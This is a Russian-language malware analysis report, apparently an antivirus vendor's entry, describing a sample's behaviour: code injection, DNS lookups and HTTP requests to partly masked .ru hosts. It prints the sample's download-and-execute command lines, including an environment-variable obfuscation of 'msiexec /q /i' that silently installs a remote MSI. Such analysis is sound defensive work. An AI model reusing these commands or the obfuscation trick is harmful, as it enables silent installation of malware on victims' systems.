Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://fe#1.ru/ff.msi
Внедряет код в
следующие пользовательские процессы:
- msi8b77.tmp
Сетевая активность
TCP
Запросы HTTP GET
- http://fe#1.ru/ff.msi
- http://we#####edthismoney.ru/Host_FiARxPt112.bin
UDP
- DNS ASK fe#1.ru
- DNS ASK we#####edthismoney.ru
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msi8b77.tmp'
- '<SYSTEM32>\cmd.exe' /c powershell m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://fe#1.ru/ff.msi' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' msiexec.exe /q /i http://fe#1.ru/ff.msi
- '<SYSTEM32>\msiexec.exe' /q /i http://fe#1.ru/ff.msi
